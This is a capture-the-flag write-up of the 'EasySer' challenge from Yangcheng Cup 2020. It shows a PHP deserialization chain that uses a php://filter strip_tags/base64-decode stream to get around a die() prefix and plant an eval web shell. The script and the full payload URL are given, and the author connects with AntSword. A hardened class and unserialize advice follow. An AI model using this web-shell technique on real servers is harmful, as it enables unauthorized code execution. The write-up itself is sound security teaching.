Yangcheng Cup 2020: EasySer


This is what you see on entry; go straight to information gathering: robots.txt, www.zip, www.zip.gz.

robots.txt:

star1.php

Going in, you find this page:

Ctrl+U (view source) reveals a hint:

"You can only get into ser.php by using an insecure protocol from my home."

http://127.0.0.1/ser.php reveals the source (star1.php's can be read first the same way):

ser.php:

<?php
error_reporting(0);
// Source is only shown when the request comes from localhost (hence the SSRF hint).
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
    highlight_file(__FILE__);
}
$flag='{Trump_:"fake_news!"}';

class GWHT{
    public $hero;
    public function __construct(){
        $this->hero = new Yasuo;
    }
    // Triggered when the object is used as a string; calls hasaki() on whatever $hero holds.
    public function __toString(){
        if (isset($this->hero)){
            return $this->hero->hasaki();
        }else{
            return "You don't look very happy";
        }
    }
}
class Yongen{ //flag.php
    public $file;
    public $text;
    public function __construct($file='',$text='') {
        $this -> file = $file;
        $this -> text = $text;
    }
    // Writes $text to $file, prefixed with a die() guard; $file is never validated.
    public function hasaki(){
        $d = '<?php die("nononon");?>';
        $a= $d. $this->text;
        @file_put_contents($this-> file,$a);
    }
}
class Yasuo{
    public function hasaki(){
        return "I'm the best happy windy man";
    }
}

?>

Inside there is

<?php die("nononon");?>

which is prepended to the file content, so any malicious code we write after it cannot execute.

We can get around this with a php:// filter stream: write the payload base64-encoded, let string.strip_tags strip the die() tag, then base64-decode the file content. What remains is our malicious code; the prefix is mangled away and does not affect the code after it.
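The root cause is that Yongen::hasaki() hands an attacker-controlled $file straight to file_put_contents(), so the die() prefix is the only guard and a filter chain removes it. The following hardened replacement is an added example written for this writeup, not code from the challenge; SafeYongen, its $allowedDir parameter and the .txt-only rule are assumptions about what a safe design looks like.

```php
<?php
// Added example (not from the challenge): a hardened counterpart to Yongen::hasaki().
// SafeYongen and $allowedDir are hypothetical names chosen for this illustration.

class SafeYongen {
    public $file;
    public $text;
    private $allowedDir;

    public function __construct($file = '', $text = '', $allowedDir = '/var/www/uploads') {
        $this->file = $file;
        $this->text = $text;
        $this->allowedDir = $allowedDir;
    }

    // A class that writes files should never be reachable through unserialize().
    public function __wakeup() {
        throw new RuntimeException('SafeYongen must not be unserialized');
    }

    public function hasaki() {
        // 1. Reject any stream wrapper (php://, data://, phar://, ...).
        //    A plain file name never carries a scheme.
        if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $this->file)) {
            throw new InvalidArgumentException('stream wrappers are not allowed');
        }
        // 2. Allow only a bare file name, which also blocks "../" traversal.
        $name = basename($this->file);
        if ($name === '' || $name !== $this->file) {
            throw new InvalidArgumentException('only a bare file name is allowed');
        }
        // 3. Allow only an extension the web server will not execute.
        if (!preg_match('/^[A-Za-z0-9_\-]+\.txt$/', $name)) {
            throw new InvalidArgumentException('only .txt files are allowed');
        }
        $target = rtrim($this->allowedDir, '/') . '/' . $name;
        // 4. With the path confined, a die() prefix is no longer doing any security work.
        return file_put_contents($target, $this->text, LOCK_EX);
    }
}

// Constructed demonstration: the same shape of input as the writeup's payload is refused,
// while an ordinary note is written to the system temp directory.
$dir = sys_get_temp_dir();

$bad = new SafeYongen(
    'php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php',
    'PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg==',
    $dir
);
try {
    $bad->hasaki();
} catch (InvalidArgumentException $e) {
    echo "blocked: " . $e->getMessage() . "\n";
}

$good = new SafeYongen('note.txt', 'hello', $dir);
echo "wrote " . $good->hasaki() . " bytes to " . $dir . "/note.txt\n";
```

The deserialization entry point itself should also be closed: calling unserialize($input, ['allowed_classes' => false]) (PHP 7.0 and later) stops user input from instantiating GWHT or Yongen at all, which is the fix that makes the __toString() chain unreachable. Note that the string.strip_tags filter used in this writeup was removed in PHP 8.0, but validating the path rather than relying on the runtime version is the durable fix.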

Script:

<?php

// Minimal class stubs matching ser.php: only the properties need to survive serialization.
class GWHT{
    public $hero;
}
class Yongen{
    public $file="php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php";
    public $text="PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg==";
    //<?php @eval($_POST[1]);?>
}
$a = new GWHT();
$a ->hero = new Yongen();
echo urlencode(serialize($a));

Modifying the value directly failed, I don't know why; maybe that is the reason.

I didn't know where the upload point was. I scanned for upload parameters with arjun, but it found nothing, not sure why; the parameter that came out was c.

http://4f22b021-d9bb-4797-8bf1-60de688b4cd7.node5.buuoj.cn:81/star1.php?path=O%3A4%3A%22GWHT%22%3A1%3A%7Bs%3A4%3A%22hero%22%3BO%3A6%3A%22Yongen%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A77%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dstring.strip_tags%7Cconvert.base64-decode%2Fresource%3Dshell.php%22%3Bs%3A4%3A%22text%22%3Bs%3A36%3A%22PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs%2FPg%3D%3D%22%3B%7D%7D

Then just connect with AntSword; the password is 1.

Reference: https://www.cnblogs.com/magic123/articles/17511984.html